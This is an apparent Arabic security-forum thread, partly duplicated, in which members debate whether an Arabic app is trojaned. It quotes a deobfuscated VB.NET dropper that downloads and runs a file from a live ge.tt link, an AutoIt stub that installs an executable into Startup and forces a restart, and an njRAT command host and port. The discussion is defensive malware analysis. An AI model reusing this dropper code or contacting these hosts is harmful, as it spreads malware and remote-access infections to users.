[ يمنع ] طرح أي موضوع يحوي على كراكات أو باتشات او كيجنات من غير فحصها عبر موقع فيروس توتال [ virustotal.com ] وطرح رابط الفحص ضِمن الموضوع.
بالنسبه لمسئله الاتصال فلا
ما هي افضل طريق لكشف مثل هذة البرمجيات هل التعلم الهندسة العكسية
Dim progressBar As ProgressBar = Me.vmethod_12()
' The following expression was wrapped in a checked-statement
progressBar.Value += 1
Dim left As String = Conversions.ToString(Class1.smethod_0().Registry.GetValue(Conversions.ToString(Me.method_7(" #-17+=::-&<7=;-:4; " & vbTab & "" & vbCr & "4, " & vbTab & vbFormFeed & "%" & vbTab & "" & vbTab & "" & vbCr & "4" & vbTab & "!,", "hHHWeCYqvtugdOPQpZtIqbJ")), Conversions.ToString(Me.method_7("."";" & vbLf & " ", "CpQqpBgruokIdeZPbVSSwYs")), Nothing))
If Operators.ConditionalCompareObjectEqual(left, Me.method_7("@", "rMoDdHSUnRmqsUAhqkmIwIV"), False) Then
Interaction.MsgBox(ChrW(1585) & ChrW(1581) & ChrW(1605) & ChrW(1607) & " " & ChrW(1575) & ChrW(1604) & ChrW(1604) & ChrW(1607) & " " & ChrW(1593) & ChrW(1604) & ChrW(1609) & " " & ChrW(1575) & ChrW(1604) & ChrW(1576) & ChrW(1578) & ChrW(1575) & ChrW(1585) & " " & ChrW(1608) & ChrW(1575) & ChrW(1587) & ChrW(1603) & ChrW(1606) & ChrW(1607) & " " & ChrW(1601) & ChrW(1589) & ChrW(1610) & ChrW(1581) & " " & ChrW(1580) & ChrW(1606) & ChrW(1575) & ChrW(1578) & ChrW(1607) & " " & ChrW(1576) & ChrW(1571) & ChrW(1584) & ChrW(1606) & " " & ChrW(1575) & ChrW(1604) & ChrW(1604) & ChrW(1607), MsgBoxStyle.OkOnly, Nothing)
Thread.Sleep(50000)
Dim webClient As WebClient = New WebClient()
webClient.DownloadFile("http://ge.tt/api/1/files/4skHE8K1/0/blob?download", Conversions.ToString(Operators.ConcatenateObject(NewLateBinding.LateGet(Nothing, GetType(Interaction), "Environ", New Object()() = { RuntimeHelpers.GetObjectValue(Me.method_7("", "rMoDdHSUnRmqsUAhqkmIwIV")) }, Nothing, Nothing, Nothing), Me.method_7(String.Concat(New String()() = { "c", Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), "b" & vbTab & "4)" }), "LuAYoGbVmMcRskKhdgKSFEG"))))
Interaction.****************l(Conversions.ToString(Operators.ConcatenateObject(NewLateBinding.LateGet(Nothing, GetType(Interaction), "Environ", New Object()() = { RuntimeHelpers.GetObjectValue(Me.method_7("", "rMoDdHSUnRmqsUAhqkmIwIV")) }, Nothing, Nothing, Nothing), Me.method_7(String.Concat(New String()() = { "c", Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), "b" & vbTab & "4)" }), "LuAYoGbVmMcRskKhdgKSFEG"))), AppWinStyle.MinimizedFocus, False, -1)
End IfSleep(50000)
If FileExists("C:\diskpt0.sys") Then
Exit
EndIf
FileInstall(" .Exe", @StartupDir & "\ .Exe")
Shutdown(10)
مدهشالملف ملغم 100% بأحترافية تامة
على عكس ماقالت شركة افيرا ! ..
وجدت الملف في احدى المنتديات العربية المشهورة والموضوع في قسم المواضيع الملغمة ..
طبعاً لن اكتب اسم المنتدى لانه يعد اشهار وهذا يخالف قوانين زيزوم فأنت لو عرفت المنتدى هذاك فلا تقل اسمه بل احفظة لنفسك ..
بعدما قام اعضاء المنتدى العربي الاخر بتحليل الملف على طرقهم الخاصه بدلاً من الاعتماد على المختبرات
اكتشفوا ان الملف ملغم وهذه معلومات التلغيمة كاملة (ظاهرة للاعضاء فقط لحساسيتها)
-----
[hide]كود التلغيم كامل بعد فك الحمايه
[/hide]كود:Dim progressBar As ProgressBar = Me.vmethod_12() ' The following expression was wrapped in a checked-statement progressBar.Value += 1 Dim left As String = Conversions.ToString(Class1.smethod_0().Registry.GetValue(Conversions.ToString(Me.method_7(" #-17+=::-&<7=;-:4; " & vbTab & "" & vbCr & "4, " & vbTab & vbFormFeed & "%" & vbTab & "" & vbTab & "" & vbCr & "4" & vbTab & "!,", "hHHWeCYqvtugdOPQpZtIqbJ")), Conversions.ToString(Me.method_7("."";" & vbLf & " ", "CpQqpBgruokIdeZPbVSSwYs")), Nothing)) If Operators.ConditionalCompareObjectEqual(left, Me.method_7("@", "rMoDdHSUnRmqsUAhqkmIwIV"), False) Then Interaction.MsgBox(ChrW(1585) & ChrW(1581) & ChrW(1605) & ChrW(1607) & " " & ChrW(1575) & ChrW(1604) & ChrW(1604) & ChrW(1607) & " " & ChrW(1593) & ChrW(1604) & ChrW(1609) & " " & ChrW(1575) & ChrW(1604) & ChrW(1576) & ChrW(1578) & ChrW(1575) & ChrW(1585) & " " & ChrW(1608) & ChrW(1575) & ChrW(1587) & ChrW(1603) & ChrW(1606) & ChrW(1607) & " " & ChrW(1601) & ChrW(1589) & ChrW(1610) & ChrW(1581) & " " & ChrW(1580) & ChrW(1606) & ChrW(1575) & ChrW(1578) & ChrW(1607) & " " & ChrW(1576) & ChrW(1571) & ChrW(1584) & ChrW(1606) & " " & ChrW(1575) & ChrW(1604) & ChrW(1604) & ChrW(1607), MsgBoxStyle.OkOnly, Nothing) Thread.Sleep(50000) Dim webClient As WebClient = New WebClient() webClient.DownloadFile("http://ge.tt/api/1/files/4skHE8K1/0/blob?download", Conversions.ToString(Operators.ConcatenateObject(NewLateBinding.LateGet(Nothing, GetType(Interaction), "Environ", New Object()() = { RuntimeHelpers.GetObjectValue(Me.method_7("", "rMoDdHSUnRmqsUAhqkmIwIV")) }, Nothing, Nothing, Nothing), Me.method_7(String.Concat(New String()() = { "c", Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), "b" & vbTab & "4)" }), "LuAYoGbVmMcRskKhdgKSFEG")))) Interaction.****************l(Conversions.ToString(Operators.ConcatenateObject(NewLateBinding.LateGet(Nothing, GetType(Interaction), "Environ", New Object()() = { RuntimeHelpers.GetObjectValue(Me.method_7("", "rMoDdHSUnRmqsUAhqkmIwIV")) }, Nothing, Nothing, Nothing), Me.method_7(String.Concat(New String()() = { "c", Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), "b" & vbTab & "4)" }), "LuAYoGbVmMcRskKhdgKSFEG"))), AppWinStyle.MinimizedFocus, False, -1) End If
[hide]
رابط الداونلودر لكم
http://ge.tt/api/1/files/4skHE8K1/0/blob?download
[/hide]
[hide][/hide][hide]
السيرفر مدموج اوتوايت
بعد الفك اليكم السكربت
كود:Sleep(50000) If FileExists("C:\diskpt0.sys") Then Exit EndIf FileInstall(" .Exe", @StartupDir & "\ .Exe") Shutdown(10)
التلغيمه فيها شرط ان كان النظام مجمد فالتشغيلة لن تشتغل
وبعد تحقيق الشرط تعمل ريستارت وتثبت في الستآرت آب ثم تشتغل
السرفر نجرات وبرمجته دوت نت
النزول : C:\Users\Test\AppData\Local\Temp\Â Â Â Â Â Â .Exe
الهوست : g0ogle.myvnc.com
البورت : 5566
[/hide]
مدهش
اذا كان الامر صحيحا فهي اول مره ارى فيها مثل هذا الخطأ الشنيع من مختبر الافيرا
جار تشغيل الملف للاحاطه بالتفاصيل + الارسال الى مختبر Fortinet كذلك ,
اذا الكومودو مضبوط عندك على رصد الاتصال .. لا اعتقد سيفلت منه .. ربما الملف ملغم لكن فيه خلل ولا يعمل بالشكل الذي اراده الهكر
باذن اخونا طارق للخروج عن الموضوع
اخي الغالي لا يعني خبراء انهم اكتشف انة سليم ام خبيث مع العلم هذا التحليل من مختبر الكمودو من تحليل خبراء وتم كشفة على انه خبيثماشاء الله تحليلات المختبر رائعه كالعاده ,, واضح انهم حللوا الملف بدقه بالغه .. تطبيق عربي و يتصل بموقع ديني !
يبدو ان الملف يحتوي على ما يدعو للشك فعلا .. لكن الملف لا يقوم بالفعل بأي سلوك خبيث يمكن رصده ,
ربما تلغيمه فاشله
و لا اعتقد ان الملاحظات التي لاحظها الاخوه في ذلك المنتدى قد مرت عليهم دون الانتباه لها , لكن الملف بالفعل لا يقوم بأي سلوك خبيث
لا اعرف رأيكم لكن .. انا بصراحه اثق في تحليل المختبرات اكثر من تحليل المنتديات
لان من يقومون بالتحليل هناك هم اهل الاختصاص و خبراء على مستوى العالم , و ليسوا هواه !!
الملف ملغم 100% بأحترافية تامة
على عكس ماقالت شركة افيرا ! ..
وجدت الملف في احدى المنتديات العربية المشهورة والموضوع في قسم المواضيع الملغمة ..
طبعاً لن اكتب اسم المنتدى لانه يعد اشهار وهذا يخالف قوانين زيزوم فأنت لو عرفت المنتدى هذاك فلا تقل اسمه بل احفظة لنفسك ..
بعدما قام اعضاء المنتدى العربي الاخر بتحليل الملف على طرقهم الخاصه بدلاً من الاعتماد على المختبرات
اكتشفوا ان الملف ملغم وهذه معلومات التلغيمة كاملة (ظاهرة للاعضاء فقط لحساسيتها)
-----
[hide]كود التلغيم كامل بعد فك الحمايه
[/hide]كود:Dim progressBar As ProgressBar = Me.vmethod_12() ' The following expression was wrapped in a checked-statement progressBar.Value += 1 Dim left As String = Conversions.ToString(Class1.smethod_0().Registry.GetValue(Conversions.ToString(Me.method_7(" #-17+=::-&<7=;-:4; " & vbTab & "" & vbCr & "4, " & vbTab & vbFormFeed & "%" & vbTab & "" & vbTab & "" & vbCr & "4" & vbTab & "!,", "hHHWeCYqvtugdOPQpZtIqbJ")), Conversions.ToString(Me.method_7("."";" & vbLf & " ", "CpQqpBgruokIdeZPbVSSwYs")), Nothing)) If Operators.ConditionalCompareObjectEqual(left, Me.method_7("@", "rMoDdHSUnRmqsUAhqkmIwIV"), False) Then Interaction.MsgBox(ChrW(1585) & ChrW(1581) & ChrW(1605) & ChrW(1607) & " " & ChrW(1575) & ChrW(1604) & ChrW(1604) & ChrW(1607) & " " & ChrW(1593) & ChrW(1604) & ChrW(1609) & " " & ChrW(1575) & ChrW(1604) & ChrW(1576) & ChrW(1578) & ChrW(1575) & ChrW(1585) & " " & ChrW(1608) & ChrW(1575) & ChrW(1587) & ChrW(1603) & ChrW(1606) & ChrW(1607) & " " & ChrW(1601) & ChrW(1589) & ChrW(1610) & ChrW(1581) & " " & ChrW(1580) & ChrW(1606) & ChrW(1575) & ChrW(1578) & ChrW(1607) & " " & ChrW(1576) & ChrW(1571) & ChrW(1584) & ChrW(1606) & " " & ChrW(1575) & ChrW(1604) & ChrW(1604) & ChrW(1607), MsgBoxStyle.OkOnly, Nothing) Thread.Sleep(50000) Dim webClient As WebClient = New WebClient() webClient.DownloadFile("http://ge.tt/api/1/files/4skHE8K1/0/blob?download", Conversions.ToString(Operators.ConcatenateObject(NewLateBinding.LateGet(Nothing, GetType(Interaction), "Environ", New Object()() = { RuntimeHelpers.GetObjectValue(Me.method_7("", "rMoDdHSUnRmqsUAhqkmIwIV")) }, Nothing, Nothing, Nothing), Me.method_7(String.Concat(New String()() = { "c", Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), "b" & vbTab & "4)" }), "LuAYoGbVmMcRskKhdgKSFEG")))) Interaction.****************l(Conversions.ToString(Operators.ConcatenateObject(NewLateBinding.LateGet(Nothing, GetType(Interaction), "Environ", New Object()() = { RuntimeHelpers.GetObjectValue(Me.method_7("", "rMoDdHSUnRmqsUAhqkmIwIV")) }, Nothing, Nothing, Nothing), Me.method_7(String.Concat(New String()() = { "c", Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), Conversions.ToString(Strings.Chr(236)), "b" & vbTab & "4)" }), "LuAYoGbVmMcRskKhdgKSFEG"))), AppWinStyle.MinimizedFocus, False, -1) End If
[hide]
رابط الداونلودر لكم
http://ge.tt/api/1/files/4skHE8K1/0/blob?download
[/hide]
[hide][/hide][hide]
السيرفر مدموج اوتوايت
بعد الفك اليكم السكربت
كود:Sleep(50000) If FileExists("C:\diskpt0.sys") Then Exit EndIf FileInstall(" .Exe", @StartupDir & "\ .Exe") Shutdown(10)
التلغيمه فيها شرط ان كان النظام مجمد فالتشغيلة لن تشتغل
وبعد تحقيق الشرط تعمل ريستارت وتثبت في الستآرت آب ثم تشتغل
السرفر نجرات وبرمجته دوت نت
النزول : C:\Users\Test\AppData\Local\Temp\Â Â Â Â Â Â .Exe
الهوست : g0ogle.myvnc.com
البورت : 5566
[/hide]
اخي احمد , بصراحه تحليلات كومودو تحديدا غير واضحه و ضبابيه
ماشاء الله تحليلات المختبر رائعه كالعاده ,, واضح انهم حللوا الملف بدقه بالغه .. تطبيق عربي و يتصل بموقع ديني !
يبدو ان الملف يحتوي على ما يدعو للشك فعلا .. لكن الملف لا يقوم بالفعل بأي سلوك خبيث يمكن رصده ,
ربما تلغيمه فاشله
و لا اعتقد ان الملاحظات التي لاحظها الاخوه في ذلك المنتدى قد مرت عليهم دون الانتباه لها , لكن الملف بالفعل لا يقوم بأي سلوك خبيث
لا اعرف رأيكم لكن .. انا بصراحه اثق في تحليل المختبرات اكثر من تحليل المنتديات
لان من يقومون بالتحليل هناك هم اهل الاختصاص و خبراء على مستوى العالم , و ليسوا هواه !!
ههههه
طيب شو رايك في مختبرات افيرا اخاف يكونوا هواه نفسنا
الافضل ان نقوم بتحليل الملف الاصلي
اعتقد نفس تحليل fortinet
لان الملف لا يقوم بالاختراق فعلا
بالضبط
.. لكن من اين احضرت الملف ؟
, هذا هو السؤال على رأي شكسبير
بصراحة نحن ندور وندور والاجابة اتت من المنتدى المجاور على طبق من فضةبالضبط
هل قام التطبيق بتحميله
ولو بقينا نحلل لن نصل الى ما وصلو الية
الله اعلم طبعا و انا مجرد هاو في مجال الحمايه ,, و لا افقه في البرمجه و ما شابهها مثقال ذرهبصراحة نحن ندور وندور والاجابة اتت من المنتدى المجاور على طبق من فضة
+
الاتصال لتحميل الملف حسب سورس البرنامج معمول له تاخير
+
زائد خبيرنا الوحيد الدكتور فتحي اجزم انة ملف خبيث مع الدليل وكذالك مختبر الكمودو